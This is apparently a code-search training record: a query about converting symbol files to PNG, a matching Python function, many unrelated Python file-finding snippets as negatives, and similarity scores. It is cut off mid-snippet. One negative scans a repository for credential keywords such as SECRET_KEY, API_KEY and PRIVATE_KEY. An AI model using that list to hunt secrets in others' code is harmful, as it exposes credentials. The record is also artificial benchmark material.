os.path.join(sub_root, file)\n result.append(file)\n return result", "def find(self, file, version):\n matches = []\n for root, dirnames, filenames in os.walk(self.full_doc_path(version)):\n for filename in fnmatch.filter(filenames, file):\n matches.append(os.path.join(root, filename))\n return matches", "def __find_eligible_plugins_in_directory(cls, directory_to_search):\n\n plugin_files = [\n x\n for x in os.listdir(directory_to_search)\n if x.endswith(\".py\") and x[0:-3] != \"__init__\"\n ]\n return plugin_files", "def locGlob(): \n #glob = \"From Internal Local Name Space\" # Toggle Comment\n print(glob)\n\n return", "def getAllDSP (self, inDEV):\n result = []\n def filterDSP (list, dirname, names):\n for name in names:\n if name [-4:] == '.dsp':\n fullpath = os.path.join (dirname, name)\n list.append (fullpath)\n os.path.walk (inDEV, filterDSP, result)\n result = filter (self.isValidPattern, result)\n return result", "def find_exposures(dir='*', prefix='*'):\n dir_prefix = '%s/%s' % (dir, prefix)\n\n sci_exposures = set(glob.glob('%s*SCI_RECONSTRUCTED*.fits' % dir_prefix)) \\\n - set(glob.glob('%s*star*.fits' % dir_prefix)) \\\n - set(glob.glob('%s*SKYFIX*.fits' % dir_prefix)) \\\n - set(glob.glob('%s*SKYSPEC*.fits' % dir_prefix)) \\\n - set(glob.glob('%s*MASK*.fits' % dir_prefix)) \\\n - set(glob.glob('%s*COMBINE*.fits' % dir_prefix)) \\\n - set(glob.glob('%s*COLL*.fits' % dir_prefix)) \\\n - set(glob.glob('%s*BADCALIB*.fits' % dir_prefix)) \\\n - set(glob.glob('%s*FLUXFIX*.fits' % dir_prefix))\n\n print(len(sci_exposures), 'science exposures found')\n\n return sci_exposures", "def _filter(self, path):\n return path.endswith('.py')", "def GetFilesForTool(self):\n return ['tools/valgrind/android/vg-chrome-wrapper.sh',\n 'tools/valgrind/memcheck/suppressions.txt',\n 'tools/valgrind/memcheck/suppressions_android.txt']", "def filter_paths(path):\n return [\"{}/{}\".format(path, f) for f in os.listdir(path) if\n f.endswith(FILE_EXTENSION_VM)]", "def search_entries(search):\n _, filenames = default_storage.listdir(\"entries\")\n result = []\n for filename in filenames: \n if filename.endswith(\".md\"):\n nameonly = re.sub(r\"\\.md$\", \"\", filename)\n \n if nameonly.lower() == search.lower():\n #print(\"name only :\", nameonly)\n #print(\"search :\", search)\n return (nameonly)\n elif search.lower() in nameonly.lower():\n result.append(nameonly)\n return(result)", "def find_avail_mof_files(dell_version):\n assert dell_version is not None\n mof_path = os.path.join(MOFParser.MOF_DIR, dell_version)\n entries = []\n for mof_file_name in glob.glob('{}/*.[Mm][Oo][Ff]'.format(mof_path)):\n mof_file_path = os.path.join(mof_path, mof_file_name)\n mof_file_base_name = os.path.basename(mof_file_name)\n entry = MOFParser.MOFFileEntry(base_name=mof_file_base_name, path=mof_file_path)\n entries.append(entry)\n _LOGGER.debug(\"Collected this list of available mof files for dell version %s : %s\",\n dell_version, entries)\n return entries", "def _search_files(self, path, path_glob):\n files = glob.glob(\"%s/%s\"% (path, path_glob))\n files_filt = []\n print \"Searching for matching files in %s/:\" % path\n for f in files:\n if re.search(self._info['pattern'], os.path.basename(f)) is not None:\n files_filt.append(f)\n if len(files_filt) == 0:\n print \"None found.\"\n return files_filt", "def _pkg_filter ( self, pkg_filename ):\n return self.pkg_regex.match ( pkg_filename ) is not None", "def search_file(path, regex, ignore_case, include_undefined, printer):\n re_flags = re.IGNORECASE if ignore_case else 0\n object_files = parse_file(path)\n results = []\n for object_file in object_files:\n for symbol in object_file.symbols:\n if not include_undefined and not symbol.is_defined:\n continue\n if re.search(regex, symbol.name, flags=re_flags):\n results.append(SearchResult(SymbolMatch(symbol, regex, ignore_case),\n ObjectFileLocation(object_file)))\n printer.print_results(results)", "def test_known_file_locations(dataset: linux.LinuxSourcesDataset):\n assert (dataset.src_tree_root / \"kernel\" / \"kexec.c\").is_file()\n assert (dataset.src_tree_root / \"kernel\" / \"smpboot.h\").is_file()", "def find(self, path, all=False):\n matches = []\n if path in self.sources:\n for match in self.loader.get_template_sources(path):\n if not all:\n return match\n matches.append(match)\n return matches", "def find_vtfs(path):\n \n vtfs = []\n for item in os.listdir(path):\n itemPath = os.path.join(path, item)\n if os.path.isdir(itemPath):\n vtfs += find_vtfs(itemPath)\n elif item.endswith('.vtf'):\n vtfs.append(itemPath)\n \n return vtfs", "def find_src_files(kem_dir):\n for dirpath, _, filenames in os.walk(kem_dir):\n for fn in filenames:\n if fn.endswith('.c'):\n if dirpath != kem_dir:\n ndir = dirpath[len(kem_dir) + 1:]\n yield os.path.join(ndir, fn)\n else:\n yield fn", "def get_tracignore_patterns(env_parent_dir):\n path = os.path.join(env_parent_dir, '.tracignore')\n try:\n lines = [line.strip() for line in read_file(path).splitlines()]\n except IOError:\n return ['.*']\n return [line for line in lines if line and not line.startswith('#')]", "def find_binaries():\n\n builddir = Path(__file__).parent.parent / \"builddir\"\n\n bins = []\n\n for folder in [\"examples\", \"tests\", \"tools\"]:\n for path in sorted((builddir / folder).rglob(\"*\")):\n if path.stem.startswith(\"xnvme_single\"):\n continue\n if path.stem.startswith(\"xnvme_dev\"):\n continue\n if path.stem.startswith(\"xnvme_enum\"):\n continue\n if path.is_file() and path.stat().st_mode & os.X_OK:\n bins.append(path.name)\n\n return bins", "def find_extra_include(file_name):\r\n extra_includes = []\r\n with open(file_name) as f:\r\n for m in re.finditer(regex.extra_include, f.read()):\r\n extra_includes.append(m.groups(1))\r\n return extra_includes", "def get_skins_and_extensions(base_dir):\n ext_paths = []\n for subdir in ['extensions', 'skins']:\n for name in os.listdir(os.path.join(base_dir, subdir)):\n if os.path.isdir(os.path.join(base_dir, subdir, name)):\n ext_paths.append(os.path.join(subdir, name))\n return ext_paths", "def get_config_files(self):\n self.clear_lists()\n print self.abs_directory\n for file in os.listdir(self.abs_directory):\n print file\n if file.endswith('.json') and \"qemii\" in file:\n self.txt_files.append(file)", "def get_data_files():\n return [\n ('share/jupyter/nbextensions/{}'.format(PY_PACKAGE), TARGETS),\n ('share/jupyter/lab/extensions', [\n os.path.relpath(f, '.') for f in glob.glob(TAR_PATH)\n ])\n ]", "def _find_special(self):\n charnames = self._get_char_names()\n for eventdir in glob.glob('/sys/class/input/event*'):\n char_name = os.path.split(eventdir)[1]\n if char_name in charnames:\n continue\n name_file = os.path.join(eventdir, 'device', 'name')\n with open(name_file) as name_file:\n device_name = name_file.read().strip()\n if device_name in self.codes['specials']:\n self._parse_device_path(\n self.codes['specials'][device_name],\n os.path.join('/dev/input', char_name))", "def scan_plugin(self):\n pluginpath=_module_path()\n plugins=[]\n for f in os.listdir(pluginpath):\n if os.path.isfile(os.path.join(pluginpath,f)) and os.path.splitext(os.path.join(pluginpath,f))[-1]=='.py' :\n if 'plugin_' in os.path.basename(f):\n logger.debug(\"found plugin : %s\",f)\n plugins.append(f)\n return plugins", "def readfiles(self, dirname , search , notsearch = 'rgvar' , notdir = 'xyvwa'):\n print('We are in the following directory: %s looking for files that contain %s and not %s' %(dirname, search , notsearch))\n dirlist = os.listdir(dirname)\n for filep in dirlist:\n filep = os.path.join(dirname,filep) \n if os.path.islink(filep):\n pass\n elif os.path.isdir(filep):\n m = re.search(notdir , filep)\n if m is None:\n self.readfiles(filep , search, notsearch = notsearch, notdir = notdir )\n elif os.path.isfile(filep) and '.dat' in filep: \n nm = re.search(notsearch, filep)\n m = re.search(search , filep)\n #print m , nm\n if m is not None and nm is None:\n self.plotfiles.append(filep)\n else:\n pass", "def coffeescript_files():\r\n dirs = \" \".join(THEME_COFFEE_PATHS + [Env.REPO_ROOT / coffee_dir for coffee_dir in COFFEE_DIRS])\r\n return cmd('find', dirs, '-type f', '-name \\\"*.coffee\\\"')", "def list_files(self):\n re_css = re.compile(r'\\.css$')\n re_js = re.compile(r'\\.js$')\n re_adminlte2 = re.compile(r'adminlte2')\n file_list = []\n print \"static path is %s\" % self.static_path\n for dirpath, _, files in os.walk(self.static_path):\n if not re_adminlte2.search(dirpath):\n for name in files:\n if re_css.search(name) or re_js.search(name):\n file_list.append(os.path.join(dirpath, name))\n return file_list", "def opendir() -> list:\n fileexr = [nf for nf in listdir(path=format(getcwd()))\n if search(pattern=r'.exr$', string=nf) and (not search(pattern=r'^L', string=nf))]\n if fileexr:\n for nf in fileexr: \n yield nf\n else:\n print('Exr file not found!')", "def pdbfile_list():\n import glob, os\n os.chdir(\"../Data\")\n file_list = []\n for file in glob.glob(\"*.pdb\"):\n file_list.append(file)\n return file_list", "def find_data_files_distutils(self, package, src_dir):\n from glob import glob\n import os\n from distutils.util import convert_path\n\n globs = (self.package_data.get('', [])\n + self.package_data.get(package, []))\n files = []\n for pattern in globs:\n # Each pattern has to be converted to a platform-specific path\n filelist = glob(os.path.join(src_dir, convert_path(pattern)))\n # Files that match more than one pattern are only added once\n files.extend([fn for fn in filelist if fn not in files\n and (os.path.isfile(fn) or os.path.islink(fn))])\n return files", "def get_filenames_containing(substr, path='.'):\n files = []\n for file_name in os.listdir(path):\n if substr in file_name: files.append(file_name)\n\n return files", "def find_package_data(package):\n walk = [(dirpath.replace(package + os.sep, '', 1), filenames)\n for dirpath, dirnames, filenames in os.walk(package)]\n\n filepaths = []\n for base, filenames in walk:\n filepaths.extend([os.path.join(base, filename)\n for filename in filenames])\n return filepaths", "def GetFilesForTool(self):\n return ['tools/valgrind/android/vg-chrome-wrapper-tsan.sh',\n 'tools/valgrind/tsan/suppressions.txt',\n 'tools/valgrind/tsan/suppressions_android.txt',\n 'tools/valgrind/tsan/ignores.txt']", "def iter_extension_paths():\n for entry_point in iter_entry_points(group=\"confab.extensions\"):\n try:\n path_func = entry_point.load()\n yield path_func()\n except ImportError as e:\n warn(str(e))", "def GetUnknownFiles(self):\n args = []\n status = RunShell([\"hg\", \"status\", \"--rev\", self.base_rev, \"-u\", \".\"],\n silent_ok=True)\n unknown_files = []\n for line in status.splitlines():\n st, fn = line.split(\" \", 1)\n if st == \"?\":\n unknown_files.append(fn)\n return unknown_files", "def test_script_exists(self):\n get_files=os.listdir(\"../../taxonomy/src_files\")\n self.assertIn(\"rdp_lineage_to_tax.py\", get_files)", "def get_paths(pattern):\n if not in_source_tree:\n pattern = '../' + pattern\n\n files = glob.glob(os.path.normpath(os.path.join(top_dir, pattern)))\n return files", "def get_all_bonn_budget_files(fPath, pattern='PlandatenErgebnisplan', end='csv'):\n rlt = []\n for f in os.listdir(fPath):\n if f.startswith(pattern) and f.endswith(end):\n rlt.append(os.path.abspath(os.path.join(fPath, f)))\n return rlt", "def filter_files(path, string):\n try:\n listing = os.listdir(path)\n return [f for f in listing if string in f]\n except:\n raise ValueError(\"Error in upy.contrib.tree.menu @ filter_files()\")", "def GetUnknownFiles(self):\r\n args = []\r\n status = RunShell([\"hg\", \"status\", \"--rev\", self.base_rev, \"-u\", \".\"],\r\n silent_ok=True)\r\n unknown_files = []\r\n for line in status.splitlines():\r\n st, fn = line.split(\" \", 1)\r\n if st == \"?\":\r\n unknown_files.append(fn)\r\n return unknown_files", "def getOMFSrcModuleFiles(self) -> List[ghidra.app.util.bin.format.pe.debug.OMFSrcModuleFile]:\n ...", "def determine_modbase_models_from_modbase_directory( query , out_directory = 'modbase_models' , root_filename = '' ):\n # defaults for written files\n if not root_filename:\n root_filename = 'modbase_' + query\n if not out_directory:\n out_directory = './' # here!\n \n # ta da!\n return [i for i in os.listdir( out_directory ) if root_filename + '_model_' in i and i[-4:] == '.pdb']", "def scanForAssays(self):\n if not self.isDataDir():\n self.setDataDir(os.getcwdu())\n files = os.listdir(self.__datadir)\n print(files)\n for f in files:\n if f.endswith('.tif'):\n print('An TIFF image here! (%s)') % f", "def find_files(directory, patterns):\n for root, dirs, files in os.walk(directory):\n for basename in files:\n if \".pyc\" not in basename and \"__pycache__\" not in basename:\n for pattern in patterns:\n if fnmatch.fnmatch(basename, pattern):\n filename = os.path.join(root, basename)\n yield filename", "def _search(self, btn):\n del btn\n if self.txt_search.value:\n found_files: Optional[List[Path]] = None\n while found_files is None:\n try:\n found_files = list(self.current_folder.rglob(self.txt_search.value))\n except FileNotFoundError:\n pass\n self.select_search.options = [\n str(file) for file in found_files if file.exists()\n ]", "def find_file(pattern, base='.'):\n\n regex = re.compile(pattern)\n matches = []\n\n for root, dirs, files in os.walk(base):\n for f in files:\n if regex.match(f):\n matches.append(path.join(base, f))\n return matches", "def boto_service_definition_files():\n\n botocore_data_dir = resource_filename(Requirement.parse(\"botocore\"), \"botocore/data\")\n files = [os.path.join(dirname, file_in_dir)\n for dirname, _, files_in_dir in os.walk(botocore_data_dir)\n for file_in_dir in files_in_dir\n if fnmatch.fnmatch(file_in_dir, 'service-*.json')]\n return files", "def files(self):\n return [surrogate(name) for name in self.hdr[rpm.RPMTAG_FILENAMES]]", "def _jupyter_nbextension_paths():\n return [{\n \"section\": \"tree\",\n \"dest\": \"nbsysinfo\",\n \"src\": \"static\",\n \"require\": \"nbsysinfo/main\"\n }]", "def test_find_with_glob(self):\r\n self.mkbundle('file?', output=\"out\").build()\r\n assert self.get(\"media/out\") == \"foo\\nbar\"", "def get_custom_short_paths(content):", "def find_cache_files():\n files = []\n\n for root, dirnames, filenames in os.walk(\".\"):\n for filename in fnmatch.filter(filenames, \"*.pyc\"):\n files.append(os.path.join(root, filename))\n\n for root, dirnames, filenames in os.walk(\".\"):\n for filename in fnmatch.filter(filenames, \"__pycache__\"):\n files.append(os.path.join(root, filename))\n\n return files", "def test_wildcard_end_regex_generation(self, mock_re_compile):\n self.finder.component_base_directories = ()\n for _ in self.finder.list(['wildcard.end*']): # generators gonna generate\n pass\n mock_re_compile.assert_called_with('^wildcard\\\\.end')", "def test_wildcard_start_regex_generation(self, mock_re_compile):\n self.finder.component_base_directories = ()\n for _ in self.finder.list(['*wildcard.start']): # generators gonna generate\n pass\n mock_re_compile.assert_called_with('wildcard\\\\.start$')", "def find(self):\n extension_hooks = list()\n #Find all extension names\n dirs = pylabs.q.system.fs.listDirsInDir(self.rootDir, True,findDirectorySymlinks=True)\n # Use a simple PMExtensionFactory\n factory = PMExtensionFactory()\n for dir in (d for d in dirs if pylabs.q.system.fs.exists(os.path.join(d, self.extensionConfigName))):\n #we found possible extension because extension.cfg file found\n pylabs.q.logger.log('Found extension in %s' % dir, 6)\n # Load extension ini file\n configfilePath = os.path.join(dir, self.extensionConfigName)\n inifile = pylabs.inifile.IniFile(configfilePath)\n path = pylabs.q.system.fs.getDirName(configfilePath)\n hooks = self._getHookInformation(inifile, path, factory)\n extension_hooks.extend(hooks)\n return extension_hooks", "def find_firmware_file(dir='.'):\n for file in os.listdir(dir):\n if file[-4:] in ('.hex', '.bin'):\n return file", "def find_object_files(kem_dir):\n for dirpath, _, filenames in os.walk(kem_dir):\n for fn in filenames:\n if fn.endswith('.o'):\n yield os.path.join(dirpath, fn)", "def find_sensitive_strings(repo_path):\n print(\"Searching for sensitive strings...\")\n sensitive_strings = []\n for root, _, files in os.walk(repo_path):\n for filename in files:\n if filename.endswith('.py'):\n file_path = os.path.join(root, filename)\n with open(file_path, 'r', encoding='utf-8') as file:\n content = file.read()\n # Look for commonly sensitive strings in Flask applications\n common_sensitive_strings = [\n \"SECRET_KEY\",\n \"PASSWORD\",\n \"API_KEY\",\n \"AUTH_TOKEN\",\n \"DATABASE_URI\",\n \"CREDENTIALS\",\n \"ACCESS_KEY\",\n \"SECRET\",\n \"TOKEN\",\n \"PRIVATE_KEY\",\n \"DB_PASSWORD\",\n \"JWT_SECRET\",\n ]\n for string in common_sensitive_strings:\n if string in content:\n sensitive_strings.append(f\"Found '{string}' in file: {file_path}\")\n\n return sensitive_strings", "def file_check(pattern, file_to_check):\n if file_to_check.name.__contains__(pattern):\n yield True", "def relatedFiles(fname):\n\n # We want to return all files in the same\n # directory which have the following name:\n\n #\n # [prefix].*.[type].gii\n #\n # where\n # - prefix is the file prefix, and which\n # may include periods.\n #\n # - we don't care about the middle\n #\n # - type is func, shape, label, or time\n\n # We determine the unique prefix of the\n # given file, and back-up to the most\n # recent period. Then search for other\n # files which have that same (non-unique)\n # prefix.\n prefix = fslpath.uniquePrefix(fname)\n lastdot = prefix.rfind('.')\n prefix = prefix[:lastdot]\n\n if lastdot == -1:\n return []\n\n funcs = list(glob.glob('{}*.func.gii' .format(prefix)))\n shapes = list(glob.glob('{}*.shape.gii'.format(prefix)))\n labels = list(glob.glob('{}*.label.gii'.format(prefix)))\n times = list(glob.glob('{}*.time.gii' .format(prefix)))\n\n return funcs + shapes + labels + times", "def find_files(base_path,pattern):\n res=()\n print_verbose(2,\"\\t> Recursive search: Base path = %s, pattern = %s\" %(base_path,pattern))\n for root, dirs, files in os.walk(base_path, topdown=True):\n for f_name in fnmatch.filter(files, pattern):\n res= res + (os.path.join(root, f_name),)\n return res;", "def list_runs_in_swestore(path, pattern=RUN_RE, no_ext=False):\n try:\n status = check_call(['icd', path])\n proc = Popen(['ils'], stdout=PIPE)\n contents = [c.strip() for c in proc.stdout.readlines()]\n runs = [r for r in contents if re.match(pattern, r)]\n if no_ext:\n runs = [r.split('.')[0] for r in runs]\n return runs\n except CalledProcessError:\n return []", "def tdfiles(self):\r\n _tdfiles = []\r\n if self.dir_exists:\r\n files = os.listdir(self.csvdir)\r\n _tdfiles = fnmatch.filter(files, self.search_pattern)\r\n return _tdfiles", "def _get_files(self):\n # pylint: disable=unused-variable\n for dirpath, __, filenames in os.walk(self.start_location):\n for file_ in filenames:\n if file_.endswith('.py'):\n yield \"{0}{1}\".format(dirpath, file_)", "def get_files(start_str = \"sim_\"):\n n = len(start_str)\n file_list = [f for f in os.listdir(in_path) if f[0:n] == start_str]\n return file_list", "def findfiles(path, ext=\".pyc\"):\n results = []\n regex = re.compile(re.escape(ext)+\"$\", re.I)\n\n tree = os.walk(path)\n for d in tree:\n # Each element of a walker represents a directory and its contents.\n # Diagnostic, if you wish.\n #print(d)\n if d[2]:\n # Are there files in this directory?\n for f in d[2]:\n if regex.findall(f):\n relpath = os.path.join(d[0], f)\n results.append(os.path.realpath(relpath))\n\n return results", "def search(self):\n files = os.listdir(self.filePath)\n txt_file = []\n for f in files:\n f_ext = f.split('.')[-1]\n if f_ext == self.flag:\n if self.flag == 'txt':\n txt_file.append(FileTxt(os.sep.join([self.filePath, f])))\n\n if self.flag == 'csv':\n txt_file.append(FileCsv(os.sep.join([self.filePath, f])))\n\n return txt_file", "def locate(pattern, root=os.curdir):\n for path, dirs, files in os.walk(os.path.abspath(root)):\n for filename in fnmatch.filter(files, pattern):\n yield os.path.join(path, filename)", "def pyfiles():\n for dir, _, files in os.walk('.'):\n for f in files:\n if f.endswith('.py'):\n name = path.join(dir, f)\n if name.startswith('./'):\n yield name[2:]\n else:\n yield name", "def get_file_list(start):\n valid_files = []\n for root, dirs, files in os.walk(start):\n for name in files:\n if name[-5:] == \".conf\":\n valid_files.append(os.path.join(root,name))\n return valid_files", "def grep_me(pattern, fname):\n for line in stream_reader(fname):\n if re.search(pattern, line, re.I):\n print('{}:{}:{}'.format(filename(), filelineno(), line), end='')", "def files(self):\r\n files = []\r\n for path in self.paths:\r\n if os.path.isdir(path):\r\n files.extend(glob.glob(os.path.join(path, f'*{self.ext}')))\r\n else:\r\n files.extend(glob.glob(path))\r\n return list(set(self.get_pattern(fname) for fname in files))", "def find_eggs(path):\n eggs, errors = pkg_resources.working_set.find_plugins(\n pkg_resources.Environment([path])\n )\n return eggs" ]
[ "0.6017925", "0.56027436", "0.5597905", "0.555413", "0.5544122", "0.54559", "0.5441576", "0.5366995", "0.53383917", "0.5280805", "0.5255213", "0.5246665", "0.5238796", "0.52089924", "0.5191325", "0.5161962", "0.51558715", "0.5154216", "0.51451254", "0.513593", "0.5125903", "0.5061598", "0.50500447", "0.5048599", "0.50470847", "0.50244004", "0.5017165", "0.49997702", "0.499968", "0.4995953", "0.49872935", "0.49828067", "0.4982", "0.49807334", "0.4977224", "0.49719188", "0.49707374", "0.49640462", "0.49505746", "0.49469644", "0.49463704", "0.49359244", "0.4934676", "0.4924862", "0.49245393", "0.49223945", "0.49220398", "0.49163103", "0.49163043", "0.4916014", "0.49132055", "0.4899421", "0.48879084", "0.4884161", "0.48833948", "0.48819375", "0.4879848", "0.4876707", "0.4872222", "0.4871832", "0.48700315", "0.4869861", "0.48639652", "0.48589683", "0.48546892", "0.48518634", "0.48505497", "0.48444128", "0.48375624", "0.48294526", "0.48256811", "0.48213363", "0.48171532", "0.48163438", "0.48116782", "0.4808684", "0.47978804", "0.47967345", "0.47947207", "0.4793557", "0.4788044", "0.47863412", "0.478548", "0.47805303", "0.47761422", "0.4774479", "0.47696504", "0.47684008", "0.4767644", "0.47665262", "0.47649124", "0.47563216", "0.47489488", "0.47482082", "0.4746539", "0.47439563", "0.47427532", "0.47421533", "0.47413942", "0.47379118" ]
0.60150164
1
Process one symbol file and convert to PNG.
def process_symbol(filename, mod, mod_cfg, mirror_root, prod_root): working_path = os.path.join(mirror_root, prod_root[1:]) log.debug("Finding version from %s", working_path) mod_version = utils.get_module_version(working_path, mod_cfg.area, mod, mod_cfg.version) log.info("Found version %s", mod_version) coords = coordinates.create(prod_root, mod_cfg.area, mod, mod_version) mirror_path = os.path.join(mirror_root, coordinates.as_path(coords)[1:]) full_path = os.path.join(mirror_path, mod_cfg.edl_dir, filename[:-3] + 'edl') destination = os.path.dirname(os.path.join(mirror_path, mod_cfg.opi_dir, filename)) log.info('Destination directory is {}'.format(destination)) if os.path.exists(destination): for f in os.listdir(destination): n = os.path.split(filename)[1] n = '.'.join(n.split('.')[:-1]) if f.startswith(n) and f.endswith('png'): log.info('Symbol png already exists: %s', f) return f else: log.warn('Failed to process symbol: %s does not exist', destination) return if os.path.exists(full_path): return files.convert_symbol(full_path, [destination]) else: log.warn('Symbol %s does not exist', full_path)
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def decode():\r\n # Open the file with binary instructions\r\n with open(file_name) as file:\r\n lines = file.readlines()\r\n with open(PATH + file_name, \"w\") as file_write:\r\n for line in lines:\r\n file_write.write(line + \"\\n\")\r\n\r\n # Read the instructions\r\n instructions, instruction_names = [], []\r\n parse_instr_bin_list(lines, instructions, instruction_names)\r\n\r\n # Print formatted binary instructions and their names\r\n instr_print(instructions, instruction_names)\r\n\r\n # Write to each of MPS-Files parsed hex-instructions\r\n write_mps(instructions)\r\n\r\n # Write to Mapping-PROM linked addresses\r\n write_mapping_prom(instruction_names)", "def main():\n folder = \"D:\\\\Noam10\\\\Documents\\\\Documents\\\\dither 2\"\n filename = \"kirigiri\"\n filetype = \".jpg\"\n input_file = folder + \"\\\\\" + filename + filetype\n for palette in paletteDict.keys():\n output_file = folder + \"\\\\\" + filename + \"(\" + palette + \").bmp\"\n Dither(input_file, output=output_file, palette=paletteDict[palette])\n print(output_file)", "def encode_png(track_metadata):\n\tprint(\"---- Encoding\", track_metadata.file_name, \"to PNG...\")\n\n\t# First step: OptiPNG.\n\tnew_file_name = track_metadata.file_name + \".png\"\n\toptipng_command = [\"optipng\", \"-o7\", \"-strip\", \"all\", \"-snip\", \"-out\", new_file_name, track_metadata.file_name]\n\tprint(optipng_command)\n\tprocess = subprocess.Popen(optipng_command, stdout=subprocess.PIPE)\n\t(cout, cerr) = process.communicate()\n\texit_code = process.wait()\n\tif exit_code != 0: #0 is success.\n\t\traise Exception(\"OptiPNG failed with exit code {exit_code}. CERR: {cerr}\".format(exit_code=exit_code, cerr=cerr))\n\n\tect_command = [\"/home/ruben/encoding/Efficient-Compression-Tool/build/ect\", \"-9\", \"-strip\", \"--allfilters-b\", \"--mt-deflate\", new_file_name]\n\tprint(ect_command)\n\tprocess = subprocess.Popen(ect_command, stdout=subprocess.PIPE)\n\t(cout, cerr) = process.communicate()\n\texit_code = process.wait()\n\tif exit_code != 0: #0 is success.\n\t\traise Exception(\"ECT failed with exit code {exit_code}. CERR: {cerr}\".format(exit_code=exit_code, cerr=cerr))\n\n\t#Delete old file.\n\tif os.path.exists(track_metadata.file_name):\n\t\tos.remove(track_metadata.file_name)\n\n\ttrack_metadata.file_name = new_file_name\n\ttrack_metadata.codec = \"png\"", "def main():\n usage = \"usage: %prog [options] input: BioC File (args[0]); Output Directory for the (picture) .svg file.\"\n parser = OptionParser(version='%prog 0.99', usage=usage)\n\n parser.add_option('-l', '--logfile', dest='logfilename',\n help='write log to FILE', metavar='FILE')\n parser.add_option('-q', '--quiet',\n action='store_true', dest='quiet', default=False,\n help='do not print status messages to stderr')\n parser.add_option('-d', '--debug',\n action='store_true', dest='debug', default=False,\n help='print debug information')\n\n\n\n (options, args) = parser.parse_args()\n\n if options.debug: print >> sys.stderr, '# Starting processing'\n\n process(options=options,args=args)\n\n\n\n\n sys.exit(0) # Everything went ok!", "def convert(filename,\nRenderer: \"\"\"By default, the schematic is converted to an SVG file,\n written to the standard output. It may also be rendered using TK.\"\"\",\n):\n \n with open(filename, \"rb\") as file:\n objects = read(file)\n stat = os.stat(file.fileno())\n \n sheet = objects[1]\n assert sheet[\"RECORD\"] == Record.SHEET\n (sheetstyle, size) = {SheetStyle.A4: (\"A4\", (1150, 760)), SheetStyle.A3: (\"A3\", (1550, 1150)), SheetStyle.A: (\"A\", (950, 760))}[sheet.get(\"SHEETSTYLE\", SheetStyle.A4)]\n if \"USECUSTOMSHEET\" in sheet:\n size = tuple(int(sheet[\"CUSTOM\" + \"XY\"[x]]) for x in range(2))\n \n # Units are 1/100\" or 10 mils\n renderer = Renderer(size, \"in\", 1/100,\n margin=0.3, line=1, down=-1, textbottom=True)\n \n for n in range(int(sheet[\"FONTIDCOUNT\"])):\n n = format(1 + n)\n fontsize = int(sheet[\"SIZE\" + n]) * 0.875\n family = sheet[\"FONTNAME\" + n].decode(\"ascii\")\n kw = dict()\n italic = sheet.get(\"ITALIC\" + n)\n if italic:\n kw.update(italic=True)\n bold = sheet.get(\"BOLD\" + n)\n if bold:\n kw.update(bold=True)\n renderer.addfont(\"font\" + n, fontsize, family, **kw)\n renderer.setdefaultfont(\"font\" + sheet[\"SYSTEMFONT\"].decode(\"ascii\"))\n renderer.start()\n \n arrowhead = dict(base=5, shoulder=7, radius=3)\n arrowtail = dict(base=7, shoulder=0, radius=2.5)\n diamond = dict(base=10, shoulder=5, radius=2.5)\n \n pinmarkers = {\n PinElectrical.INPUT: arrowhead,\n PinElectrical.IO: diamond,\n PinElectrical.OUTPUT: arrowtail,\n PinElectrical.PASSIVE: None,\n PinElectrical.POWER: None,\n }\n \n def gnd(renderer):\n renderer.hline(10)\n renderer.vline(-7, +7, offset=(10, 0), width=1.5)\n renderer.vline(-4, +4, offset=(13, 0), width=1.5)\n renderer.vline(-1, +1, offset=(16, 0), width=1.5)\n def rail(renderer):\n renderer.hline(10)\n renderer.vline(-7, +7, offset=(10, 0), width=1.5)\n def arrowconn(renderer):\n renderer.hline(10, endarrow=arrowhead)\n def dchevron(renderer):\n renderer.hline(5)\n renderer.polyline(((8, +4), (5, 0), (8, -4)))\n renderer.polyline(((11, +4), (8, 0), (11, -4)))\n connmarkers = {\n PowerObjectStyle.ARROW: (arrowconn, 12),\n PowerObjectStyle.BAR: (rail, 12),\n PowerObjectStyle.GND: (gnd, 20),\n }\n \n def nc(renderer):\n renderer.line((+3, +3), (-3, -3), width=0.6)\n renderer.line((-3, +3), (+3, -3), width=0.6)\n renderer.addobjects((gnd, rail, arrowconn, dchevron, nc))\n \n with renderer.view(offset=(0, size[1])) as base:\n base.rectangle((size[0], -size[1]), width=0.6)\n base.rectangle((20, -20), (size[0] - 20, 20 - size[1]), width=0.6)\n for axis in range(2):\n for side in range(2):\n for n in range(4):\n translate = [None] * 2\n translate[axis] = size[axis] / 4 * (n + 0.5)\n translate[axis ^ 1] = 10\n if side:\n translate[axis ^ 1] += size[axis ^ 1] - 20\n translate[1] *= -1\n with base.view(offset=translate) as ref:\n label = chr(ord(\"1A\"[axis]) + n)\n ref.text(label, horiz=ref.CENTRE, vert=ref.CENTRE)\n if n + 1 < 4:\n x = size[axis] / 4 / 2\n if axis:\n ref.hline(-10, +10, offset=(0, -x),\n width=0.6)\n else:\n ref.vline(-10, +10, offset=(x, 0), width=0.6)\n \n if \"TITLEBLOCKON\" in sheet:\n if not os.path.isabs(filename):\n cwd = os.getcwd()\n pwd = os.getenv(\"PWD\")\n if os.path.samefile(pwd, cwd):\n cwd = pwd\n filename = os.path.join(pwd, filename)\n with base.view(offset=(size[0] - 20, 20 - size[1])) as block:\n points = ((-350, 0), (-350, 80), (-0, 80))\n block.polyline(points, width=0.6)\n block.hline(-350, 0, offset=(0, 50), width=0.6)\n block.vline(-30, offset=(-300, 50), width=0.6)\n block.vline(-30, offset=(-100, 50), width=0.6)\n block.hline(-350, 0, offset=(0, 20), width=0.6)\n block.hline(-350, 0, offset=(0, 10), width=0.6)\n block.vline(20, 0, offset=(-150, 0), width=0.6)\n \n block.text(\"Title\", (-345, 70))\n block.text(\"Size\", (-345, 40))\n block.text(sheetstyle, (-340, 30), vert=block.CENTRE)\n block.text(\"Number\", (-295, 40))\n block.text(\"Revision\", (-95, 40))\n block.text(\"Date\", (-345, 10))\n d = format(date.fromtimestamp(stat.st_mtime), \"%x\")\n block.text(d, (-300, 10))\n block.text(\"File\", (-345, 0))\n block.text(filename, (-300, 0))\n block.text(\"Sheet\", (-145, 10))\n block.text(\"of\", (-117, 10))\n block.text(\"Drawn By:\", (-145, 0))\n \n for obj in objects:\n if (obj.keys() - {\"INDEXINSHEET\"} == {\"RECORD\", \"OWNERPARTID\", \"LOCATION.X\", \"LOCATION.Y\", \"COLOR\"} and\n obj[\"RECORD\"] == Record.JUNCTION and obj.get(\"INDEXINSHEET\", b\"-1\") == b\"-1\" and obj[\"OWNERPARTID\"] == b\"-1\"):\n location = (int(obj[\"LOCATION.\" + x]) for x in \"XY\")\n col = 